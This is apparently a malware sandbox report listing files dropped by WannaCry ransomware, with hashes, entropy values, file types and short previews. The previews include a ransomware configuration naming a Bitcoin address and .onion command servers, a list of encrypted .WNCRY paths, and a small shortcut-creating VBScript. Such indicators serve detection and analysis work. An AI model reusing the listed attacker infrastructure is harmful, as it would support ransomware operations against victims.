                                                  SSDEEP:12:8BiXpzYNbfIhUV9nzUoBjAzodwSY+GGY+GlmCt:8BzqhEZAS1TGGTGlm
                                                  MD5:AA6944E5A685F01614D23396940EDB50
                                                  SHA1:78E8BF9C092559F147E90E6222715CDF2B094048
                                                  SHA-256:636345AD7C515F5814FE1A1A7F8FD8F416536760B1947739E29DACE712AFA005
                                                  SHA-512:B5F30DF5E81368BE91278EDA05CD9A5C708142818E63130A719E5691022CAB32F5C37F41DEBA8E2B7EDBBD8EA8A67A75E2FF842DE2C3E428CC944E970332449A
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.831720836354265
                                                  Encrypted:false
                                                  SSDEEP:24:ZNqn+lAhDjREqYaTNU3p1vrCzDFMbEBlfLCywV:ZNq+lAh+WNwX+zcUfC
                                                  MD5:55AE23E68D6F22E5FACA6ED02E836423
                                                  SHA1:21B82521502F823F51B2FBB2695D5DD61484EA23
                                                  SHA-256:E384563E3B32DD41292BEE955F21D777A45210D1CFCE7D5FE246BD67ECCC36F5
                                                  SHA-512:63AA5186AEC08D657735ECC743EEF9F68CCAB22E355EB2490958C64FBBCD564622366D0614AA1E1E96CDD943628A12239F75568CAD68C917057CB6C9EBE6469D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.842427789237601
                                                  Encrypted:false
                                                  SSDEEP:24:bkEew4gqCLGCJWkzICLMEhQZ/NwPZVCpiXaqVcwH1erebmZc0VUSjQJ7kfX653yA:bkvbgqCLoWQVyxGqVZHoZhHYofKZT
                                                  MD5:8B598DA7992C0344FDD0BE95FAA993D3
                                                  SHA1:E8472965D34A663CB193AFF25A78DD0218D52977
                                                  SHA-256:5D499AF44E33D8B2F9EDD41C5BC1D2CB203290C191D09C4F2394B149A3737186
                                                  SHA-512:4404555DB3024AD9695202A23B93CF8ADC6D82D650D56EBFE10F286A8695FC2592ED3CAFB8B88E54E9C2A922D5D77FEA1D80A9A3F71BE42AB5581A72D5A74281
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.7961263472074664
                                                  Encrypted:false
                                                  SSDEEP:24:Ce51nCWS9SPYsPc9omlxW9EyG2reA7Ot7+rgPYJ/XNKCq:Ce5FE9SPa9omlxiGoeeE7Wmk/XNKCq
                                                  MD5:8C7FB12B707DFCC496C3507094BE39E4
                                                  SHA1:0AF7FC86A197A245288AF9897C0BA013435F2DCD
                                                  SHA-256:96084946E8B279BE7B63E9EF60259675B778E16871874C43AECFDA10A7CC3CC4
                                                  SHA-512:C1449584DECF13A5A2FA369ADD8034EC96E4C2338DCFE6BE4708D774C913B1600F59DDF541CB3E9699DEFBD354136CF340702E284AF464177C83456BA3742CE3
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.8369908029718856
                                                  Encrypted:false
                                                  SSDEEP:24:bk3bjsXvwZKQW60dz/msaY1RGWt72B1j7thjg2HCOT/4XxepyxbCCDI5r+bqRngc:bkns/w0Qf0TvnGWtqDjJhje/xepyxbCZ
                                                  MD5:6BEF66E02511B84A0A25823611A88F40
                                                  SHA1:97F2DBEAB29D81DA67CAA0524C9DD4BCF4239460
                                                  SHA-256:8DA21A4531CF24D1C862C7F6D2A3B9BBBD53A9FD726B6CF5A48DCA77EAC9BCF0
                                                  SHA-512:F123968F6AE18C58B3247B2BCA456A742F7E575A3E8356ECC66A81A93E42974AB13C54D20B9B930E9117F2D6978A8E23B4758C70CF0D157865252A27869224C4
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.815272944964872
                                                  Encrypted:false
                                                  SSDEEP:24:zrwMCRVF48QfvYOHYpHSqBNTvTHElsgoqC0bkgTBnbK7qMQcDpdC:ztCuSLpHSW1THElsgDC4hTI7Hpc
                                                  MD5:248180BC7BCFB10B9C6F4DC1DC519C34
                                                  SHA1:73802AD9180A4428A1012149396A00734296BACF
                                                  SHA-256:2F2F04B235F7F07F480B6669708D4614FA4AB6D47BF1E5D400B5B750227FCDA7
                                                  SHA-512:5AC672AE6C4249F1FF526D01B1832AB2D61B9B7C43AC1C1D8C32D6B0256C1CD5F0CAC80250B0D53E2E0D6E2B13D6DF91A0BB9B930D3A481A97114E473A7BD15D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.8600995134419085
                                                  Encrypted:false
                                                  SSDEEP:24:bkgP7AkxPlvL6jMumO8+AGDbXq1ojOkfmAzFfmrULKZOEEh7Z:bkoPZit58H4q1oydgFfmrUvEEdZ
                                                  MD5:E00BD4909FF1AD2FC59C0DD26B700834
                                                  SHA1:8CCEDE3B188F88948F53250DA981502866CF2388
                                                  SHA-256:0908A18387A1815F536247CF79D03D476972AF759C03F13351C4F92447CCC3AE
                                                  SHA-512:61276B0AA4F245BE6CF7B908C1A1C8E1488855129B1B02ABF2AC4E33664CA25B72043185AFDCECD11632098874336B08AFFE945FF94A5643A77C4F6CC9EB4F87
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.7895203033273255
                                                  Encrypted:false
                                                  SSDEEP:24:wqNfV0ao+XsxRXMXwZH672c0y36ux24teSX5:b1X8KXwH6770y36A5
                                                  MD5:3A11AAF3B4B679AF1E85DA0196957B16
                                                  SHA1:CDD5A152F8DE1E9A90D3B79EF7872391677C97FC
                                                  SHA-256:9F6C5E43BC070798A6EB059578BD45A72B77EEF9B7648F80F70AF1580090C515
                                                  SHA-512:57717C0325140F0C21C0EA2A937329EB6F9CC171C785B8C61277AC5F7AAC6C3579051CB9569192B33A10F625230808B7826E7AA62D3CA8B124A8F47EE019A65A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.850870884047023
                                                  Encrypted:false
                                                  SSDEEP:24:bkUso+wfD/rdzk7b22jYCuoA0ty+iAwvYCk4xu81TmhFpsse4e6Fi:bkUJ+wZubJVtyRGeuayWs5e6w
                                                  MD5:A4EEA8E89E29E8AD13C5223A81BAF812
                                                  SHA1:37C0FF660F100E916DC45A7E582EB3D59B7C40BA
                                                  SHA-256:F1A848B1F6594FD1A7D4EE0F8856970773EA7B2C9B22A2B719F3EB1BE41D5159
                                                  SHA-512:E4AA8948F8F968B2A259F23DEE9E21EF4A064EB0B9AABD962109D76DE01E406B5865A3EF4EFB1171CFC465E9A37B3093CE0889AD6740504017EC7227088D23E8
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.796226678192958
                                                  Encrypted:false
                                                  SSDEEP:24:m3CckNTjzTkdc/S31A85mTTxeH8Cfa1dYN9Xqts6k3:m3Cc6HygHrQuE
                                                  MD5:EEB3F078DE2489A8B344014DBF30C577
                                                  SHA1:DE1950E86CD2F10EA52B7D633C58FD7F8EA90DD1
                                                  SHA-256:486B971F8B11006829AECA94D9879322497923968E5BB6FDB521DA241F4DC6A5
                                                  SHA-512:BFDD02F33A2649E57229074152E1C44903D0859E6DC99898FCB325902E2892F82595D67F106C42B22F11CB8EF92E51350574A9D4FBCA978E5A2C402BD0A7DC18
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.852923872437741
                                                  Encrypted:false
                                                  SSDEEP:24:bkJXSQfBurbKovlb+xzMHzwYYGqUJRUa3cN6YSEW9PVIFeQ7vmqtbahhkl0Aicnb:bkJiQAfvN+2TyasNHeNWEQzshhkCKJjh
                                                  MD5:3FF10E66E129EEF9B8FA9045B92133FE
                                                  SHA1:563A7AD11A20805F7B5A29271F354028B2AF50B9
                                                  SHA-256:4DAF0F0B843CB2694842CA4DE484F8782C69509257D6E26A8E84B6246463ABEB
                                                  SHA-512:FAFE911A5A77ADAD220D36D3B8B8C07D8685BE0A413E55ED86AB2B77753E16EA97B785E1C58ADF24519FF5AAC7E780C9682AD35966B6968E1F5FA8AC85F826ED
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.8028171231414705
                                                  Encrypted:false
                                                  SSDEEP:24:1YGWf8Mo45cZVXIcYi5U0NoDXLqDgVuKYCXearo2tnS2tCGX1Wu:1Y70MsZtYi10q2uKrBrDpZXP
                                                  MD5:E2D5E69252CF336CD099FBAFECEF877C
                                                  SHA1:E83E79CFF15FD565E173E14E637A7BCD8B998510
                                                  SHA-256:C30EDDF1F70BB44D1AA47134A855A54A26EC7949D83167CB45F3335ED3387D06
                                                  SHA-512:3F03493DEAA889348132F6B9B5103818A45AD253B3E97764CABCF43FCF99052CEE72F19D6D09D4A992A31A4480D0B1861DCC8908E74ED8C8F96574383B2DC661
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.826459817095266
                                                  Encrypted:false
                                                  SSDEEP:24:bkN5xH74BfWAYafw9yQTnYsFIYoPfEqCkjJIocvZWHGH0qM+O6:bkN5UiVnYvPrqoaZTS6
                                                  MD5:5B381BA418A30AEB8E6281BD66D45417
                                                  SHA1:5E202ACF6693C16F6700C064AC4AA7ACEB7F4CD5
                                                  SHA-256:54821FFE76F1A0865A5FFD03AAFD7C597461C5882E0E2DEB191E0BEA934DC1D9
                                                  SHA-512:7E1ABE53753574AE78E88A0CDDE515A4179C66D79179242361DE4BD72F8ECC74F2B3E6B0F5918D84C4E416DF612C1A1C19F891CBB9214E05EC8FC0DEF458D002
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:PC bitmap, Windows 3.x format, 800 x 600 x 24, image size 1440000, resolution 3779 x 3779 px/m, cbSize 1440054, bits offset 54
                                                  Category:dropped
                                                  Size (bytes):1440054
                                                  Entropy (8bit):0.3363393123555661
                                                  Encrypted:false
                                                  SSDEEP:384:zYzuP4tiuOub2WuzvqOFgjexqO5XgYWTIWv/+:sbL+
                                                  MD5:C17170262312F3BE7027BC2CA825BF0C
                                                  SHA1:F19ECEDA82973239A1FDC5826BCE7691E5DCB4FB
                                                  SHA-256:D5E0E8694DDC0548D8E6B87C83D50F4AB85C1DEBADB106D6A6A794C3E746F4FA
                                                  SHA-512:C6160FD03AD659C8DD9CF2A83F9FDCD34F2DB4F8F27F33C5AFD52ACED49DFA9CE4909211C221A0479DBBB6E6C985385557C495FC04D3400FF21A0FBBAE42EE7C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):780
                                                  Entropy (8bit):2.378875357594115
                                                  Encrypted:false
                                                  SSDEEP:6:ch++pZkaHqHgVcKKfF9mHRMMPRGS37LlN/sUQqGUSGeTsdEC:chrmaRVcKKfm2MYS3sUQqGLGeTEV
                                                  MD5:13FDC0BDFCC558AF0CB67F2CCEDF50ED
                                                  SHA1:84F527EF3842AB66CF17F292F21C205DE9331FC6
                                                  SHA-256:2756852E8CC70FA194332BCE038915DC0AAA2717EC98A32815480E63C9FAB602
                                                  SHA-512:2B5D524B5ED68640ABE5AF8025C1EB4E97748BBAA072461C26214CA3F1202DE589ED4857DE7CD6C021A429BC3B03CD6E3AB9A1CB432B788FF08143DCD4023654
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:..............................................................................................................ad...........C......................................................115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn................gx7ekbenv2riucmf.onion;57g7spgrzlojinas.onion;xxlvbrloxvriy2c5.onion;76jdd2ir2embyv47.onion;cwwnhwhlz52maqm7.onion;.......................................................................................................................................https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip...........................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):918
                                                  Entropy (8bit):4.682670189489066
                                                  Encrypted:false
                                                  SSDEEP:24:oS+VwuVwuVwuVwuVwuVwuVwuVwuVwhbmVwuVwuVwuVwuVwuVwuVwuVwuVwhJdkaT:oNwawawawawawawawawh+wawawawawaM
                                                  MD5:6180A0DAA217257F733A9FF7447D5C1C
                                                  SHA1:3C08383F42935C77612C20FC7DA52DDB28DFA3EE
                                                  SHA-256:B6871C1B1E6A5E1F410D1EC791BC0A7332F0522AA1F1EB0BB5A839E5746A35F6
                                                  SHA-512:D815F45133BE67E0B70098BCA49FF9435FCC94276CFD471525E0D678FFB0F3310C8AB89A4EF1FEAF940772E4810F62A109D90DFDF4E2E5DE0369B17089EEA0EA
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:C:\Users\user\Desktop\PWCCAWLGRE.mp3.WNCRY..C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Diagnosis\EventStore.db.WNCRY..C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\User Account Pictures\user-32.png.WNCRY..C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\icon_16.png.WNCRY..C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\pkcs11.txt.WNCRY..
                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):199
                                                  Entropy (8bit):4.993433402537439
                                                  Encrypted:false
                                                  SSDEEP:3:gponhvDCKFcsDONy+WlynJ96JS2x9rbPONy+WlynJSK2Fvn:e+hvbnRoJgJSoPnRoJSK2Fv
                                                  MD5:BC117AC292350CB5C49A0D1660AFF679
                                                  SHA1:FB6A629B267BBF4E7E4BC63B299F92DC1E518D4D
                                                  SHA-256:E7325F2A555AE1A1694951B7782C4159013597C2D5BF480CC091C6A0E66BFC64
                                                  SHA-512:B66227CF3944AF105818176FA43F628F89E4393B372949BC86A7513E11B62209B96B169C33E836E32C8BBA4387B78844A9FB08F37F62EC1E05DEF2F2BF89B093
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:SET ow = WScript.CreateObject("WScript.Shell")..SET om = ow.CreateShortcut("C:\Users\user\Desktop\@WanaDecryptor@.exe.lnk")..om.TargetPath = "C:\Users\user\Desktop\@WanaDecryptor@.exe"..om.Save..
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                  Category:dropped
                                                  Size (bytes):47879
                                                  Entropy (8bit):4.950611667526586
                                                  Encrypted:false
                                                  SSDEEP:768:Shef3jHdCG28Eb1tyci8crbEw6/5+3xFkbP0vyzbZrS14e:SheU5De
                                                  MD5:95673B0F968C0F55B32204361940D184
                                                  SHA1:81E427D15A1A826B93E91C3D2FA65221C8CA9CFF
                                                  SHA-256:40B37E7B80CF678D7DD302AAF41B88135ADE6DDF44D89BDBA19CF171564444BD
                                                  SHA-512:7601F1883EDBB4150A9DC17084012323B3BFA66F6D19D3D0355CF82B6A1C9DCE475D758DA18B6D17A8B321BF6FCA20915224DBAEDCB3F4D16ABFAF7A5FC21B92
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                  Category:dropped
                                                  Size (bytes):54359
                                                  Entropy (8bit):5.015093444540877
                                                  Encrypted:false
                                                  SSDEEP:768:SWjkSFwwlUdcUG2HAmDTzpXtgmDNQ8qD7DHDqMtgDdLDMaDoKMGzD0DWJQ8/QoZ4:SWcwiqDB
                                                  MD5:0252D45CA21C8E43C9742285C48E91AD
                                                  SHA1:5C14551D2736EEF3A1C1970CC492206E531703C1
                                                  SHA-256:845D0E178AEEBD6C7E2A2E9697B2BF6CF02028C50C288B3BA88FE2918EA2834A
                                                  SHA-512:1BFCF6C0E7C977D777F12BD20AC347630999C4D99BD706B40DE7FF8F2F52E02560D68093142CC93722095657807A1480CE3FB6A2E000C488550548C497998755
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                  Category:dropped
                                                  Size (bytes):79346
                                                  Entropy (8bit):4.901891087442577
                                                  Encrypted:false
                                                  SSDEEP:768:SDwtkzjHdLG2xN1fyvnywUKB5lylYlzlJpsbuEWeM/yDRu9uCuwyInIwDOHEhm/v:SDnz5Rt4D4
                                                  MD5:2EFC3690D67CD073A9406A25005F7CEA
                                                  SHA1:52C07F98870EABACE6EC370B7EB562751E8067E9
                                                  SHA-256:5C7F6AD1EC4BC2C8E2C9C126633215DABA7DE731AC8B12BE10CA157417C97F3A
                                                  SHA-512:0766C58E64D9CDA5328E00B86F8482316E944AA2C26523A3C37289E22C34BE4B70937033BEBDB217F675E40DB9FECDCE0A0D516F9065A170E28286C2D218487C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                  Category:dropped
                                                  Size (bytes):39070
                                                  Entropy (8bit):5.03796878472628
                                                  Encrypted:false
                                                  SSDEEP:384:SheftipUENLFsPzy3EFHjHdb2YG2+d18Scgn8c8/868H1F8E8/8Z3m8VdAm86a8n:Shef3jHd3G2n+p/mZrS14A
                                                  MD5:17194003FA70CE477326CE2F6DEEB270
                                                  SHA1:E325988F68D327743926EA317ABB9882F347FA73
                                                  SHA-256:3F33734B2D34CCE83936CE99C3494CD845F1D2C02D7F6DA31D42DFC1CA15A171
                                                  SHA-512:DCF4CCF0B352A8B271827B3B8E181F7D6502CA0F8C9DDA3DC6E53441BB4AE6E77B49C9C947CC3EDE0BF323F09140A0C068A907F3C23EA2A8495D1AD96820051C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                  Category:dropped
                                                  Size (bytes):40512
                                                  Entropy (8bit):5.035949134693175
                                                  Encrypted:false
                                                  SSDEEP:384:SheftipUENLFsPzy3EFHjHdg2yG2gv8n8+8zfB8k8F8i8k1Z8M8I818E838C8A8s:Shef3jHd2G26nyMZrS14g
                                                  MD5:537EFEECDFA94CC421E58FD82A58BA9E
                                                  SHA1:3609456E16BC16BA447979F3AA69221290EC17D0
                                                  SHA-256:5AFA4753AFA048C6D6C39327CE674F27F5F6E5D3F2A060B7A8AED61725481150
                                                  SHA-512:E007786FFA09CCD5A24E5C6504C8DE444929A2FAAAFAD3712367C05615B7E1B0FBF7FBFFF7028ED3F832CE226957390D8BF54308870E9ED597948A838DA1137B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                  Category:dropped
                                                  Size (bytes):37045
                                                  Entropy (8bit):5.028683023706024
                                                  Encrypted:false
                                                  SSDEEP:384:SheftipUENLFsPzy3EFHjHd02wG2roqni2Jeo75Y3kmA31dv61QyU:Shef3jHd4G2M5bZrS14Q
                                                  MD5:2C5A3B81D5C4715B7BEA01033367FCB5
                                                  SHA1:B548B45DA8463E17199DAAFD34C23591F94E82CD
                                                  SHA-256:A75BB44284B9DB8D702692F84909A7E23F21141866ADF3DB888042E9109A1CB6
                                                  SHA-512:490C5A892FAC801B853C348477B1140755D4C53CA05726AC19D3649AF4285C93523393A3667E209C71C80AC06FFD809F62DD69AE65012DCB00445D032F1277B3
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                  Category:dropped
                                                  Size (bytes):36987
                                                  Entropy (8bit):5.036160205965849
                                                  Encrypted:false
                                                  SSDEEP:384:Sw3BHSj2cLeT+sPzy3EFHjHdp2oG2/CzhReo75Y3kmA31dv61Qyz:Sw3BHSWjHdBG2/UhsZrS14f
                                                  MD5:7A8D499407C6A647C03C4471A67EAAD7
                                                  SHA1:D573B6AC8E7E04A05CBBD6B7F6A9842F371D343B
                                                  SHA-256:2C95BEF914DA6C50D7BDEDEC601E589FBB4FDA24C4863A7260F4F72BD025799C
                                                  SHA-512:608EF3FF0A517FE1E70FF41AEB277821565C5A9BEE5103AA5E45C68D4763FCE507C2A34D810F4CD242D163181F8341D9A69E93FE32ADED6FBC7F544C55743F12
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                  Category:dropped
                                                  Size (bytes):36973
                                                  Entropy (8bit):5.040611616416892
                                                  Encrypted:false
                                                  SSDEEP:384:S93BHSj2cguALeT+sPzy3EFHjHdM2EG2YLC7O3eo75Y3kmA31dv61QyW:S93BHSTjHd0G2YLCZrS14y
                                                  MD5:FE68C2DC0D2419B38F44D83F2FCF232E
                                                  SHA1:6C6E49949957215AA2F3DFB72207D249ADF36283
                                                  SHA-256:26FD072FDA6E12F8C2D3292086EF0390785EFA2C556E2A88BD4673102AF703E5
                                                  SHA-512:941FA0A1F6A5756ED54260994DB6158A7EBEB9E18B5C8CA2F6530C579BC4455918DF0B38C609F501CA466B3CC067B40E4B861AD6513373B483B36338AE20A810
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                  Category:dropped
                                                  Size (bytes):37580
                                                  Entropy (8bit):5.0458193216786
                                                  Encrypted:false
                                                  SSDEEP:384:Sw3BHSj2cLeT+sPzy3EFHjHdi2MG2AGsi6p07i/eo75Y3kmA31dv61QyR:Sw3BHSWjHdGG2Axa7iGZrS14N
                                                  MD5:08B9E69B57E4C9B966664F8E1C27AB09
                                                  SHA1:2DA1025BBBFB3CD308070765FC0893A48E5A85FA
                                                  SHA-256:D8489F8C16318E524B45DE8B35D7E2C3CD8ED4821C136F12F5EF3C9FC3321324
                                                  SHA-512:966B5ED68BE6B5CCD46E0DE1FA868CFE5432D9BF82E1E2F6EB99B2AEF3C92F88D96F4F4EEC5E16381B9C6DB80A68071E7124CA1474D664BDD77E1817EC600CB4
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                  Category:dropped
                                                  Size (bytes):38377
                                                  Entropy (8bit):5.030938473355282
                                                  Encrypted:false
                                                  SSDEEP:384:SheftipUENLFsPzy3EFHjHdg2oG2l1glOmeo75Y3kmA31dv61QyB:Shef3jHdMG2l1AO3ZrS14l
                                                  MD5:35C2F97EEA8819B1CAEBD23FEE732D8F
                                                  SHA1:E354D1CC43D6A39D9732ADEA5D3B0F57284255D2
                                                  SHA-256:1ADFEE058B98206CB4FBE1A46D3ED62A11E1DEE2C7FF521C1EEF7C706E6A700E
                                                  SHA-512:908149A6F5238FCCCD86F7C374986D486590A0991EF5243F0CD9E63CC8E208158A9A812665233B09C3A478233D30F21E3D355B94F36B83644795556F147345BF
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                  Category:dropped
                                                  Size (bytes):38437
                                                  Entropy (8bit):5.031126676607223
                                                  Encrypted:false
                                                  SSDEEP:384:SheftipUENLFsPzy3EFHjHdtW2IG2sjqMeo75Y3kmA31dv61Qyg:Shef3jHd0G2smJZrS14M
                                                  MD5:4E57113A6BF6B88FDD32782A4A381274
                                                  SHA1:0FCCBC91F0F94453D91670C6794F71348711061D
                                                  SHA-256:9BD38110E6523547AED50617DDC77D0920D408FAEED2B7A21AB163FDA22177BC
                                                  SHA-512:4F1918A12269C654D44E9D394BC209EF0BC32242BE8833A2FBA437B879125177E149F56F2FB0C302330DEC328139B34982C04B3FEFB045612B6CC9F83EC85AA9
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                  Category:dropped
                                                  Size (bytes):37181
                                                  Entropy (8bit):5.039739267952546
                                                  Encrypted:false
                                                  SSDEEP:384:SheftipUENLFsPzy3EFHjHdN26G2VSA1Ieo75Y3kmA31dv61QyU:Shef3jHdfG2oe1ZrS14w
                                                  MD5:3D59BBB5553FE03A89F817819540F469
                                                  SHA1:26781D4B06FF704800B463D0F1FCA3AFD923A9FE
                                                  SHA-256:2ADC900FAFA9938D85CE53CB793271F37AF40CF499BCC454F44975DB533F0B61
                                                  SHA-512:95719AE80589F71209BB3CB953276538040E7111B994D757B0A24283AEFE27AADBBE9EEF3F1F823CE4CABC1090946D4A2A558607AC6CAC6FACA5971529B34DAC
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                  Category:dropped
                                                  Size (bytes):49044
                                                  Entropy (8bit):4.910095634621579
                                                  Encrypted:false
                                                  SSDEEP:384:SheftipUENLFsPzy3EFHjHdc2oG2WWDFFG5BwKeo75Y3kmA31dv61QyM:Shef3jHdoG2NHG5BwLZrS14Q
                                                  MD5:FB4E8718FEA95BB7479727FDE80CB424
                                                  SHA1:1088C7653CBA385FE994E9AE34A6595898F20AEB
                                                  SHA-256:E13CC9B13AA5074DC45D50379ECEB17EE39A0C2531AB617D93800FE236758CA9
                                                  SHA-512:24DB377AF1569E4E2B2EBCCEC42564CEA95A30F1FF43BCAF25A692F99567E027BCEF4AACEF008EC5F64EA2EEF0C04BE88D2B30BCADABB3919B5F45A6633940CB
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                  Category:dropped
                                                  Size (bytes):37196
                                                  Entropy (8bit):5.039268541932758
                                                  Encrypted:false
                                                  SSDEEP:384:Sw3BHSj2cLeT+sPzy3EFHjHdY2oG2pq32eo75Y3kmA31dv61Qys:Sw3BHSWjHdUG2pq3nZrS14I
                                                  MD5:3788F91C694DFC48E12417CE93356B0F
                                                  SHA1:EB3B87F7F654B604DAF3484DA9E02CA6C4EA98B7
                                                  SHA-256:23E5E738AAD10FB8EF89AA0285269AFF728070080158FD3E7792FE9ED47C51F4
                                                  SHA-512:B7DD9E6DC7C2D023FF958CAF132F0544C76FAE3B2D8E49753257676CC541735807B4BEFDF483BCAE94C2DCDE3C878C783B4A89DCA0FECBC78F5BBF7C356F35CD
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                  Category:dropped
                                                  Size (bytes):36883
                                                  Entropy (8bit):5.028048191734335
                                                  Encrypted:false
                                                  SSDEEP:384:SheftipUENLFsPzy3EFHjHdR2AG2c/EnByeo75Y3kmA31dv61Qy9:Shef3jHdJG2cQZrS14R
                                                  MD5:30A200F78498990095B36F574B6E8690
                                                  SHA1:C4B1B3C087BD12B063E98BCA464CD05F3F7B7882
                                                  SHA-256:49F2C739E7D9745C0834DC817A71BF6676CCC24A4C28DCDDF8844093AAB3DF07
                                                  SHA-512:C0DA2AAE82C397F6943A0A7B838F60EEEF8F57192C5F498F2ECF05DB824CFEB6D6CA830BF3715DA7EE400AA8362BD64DC835298F3F0085AE7A744E6E6C690511
                                                  Malicious:false
                                                  Reputation:unknown
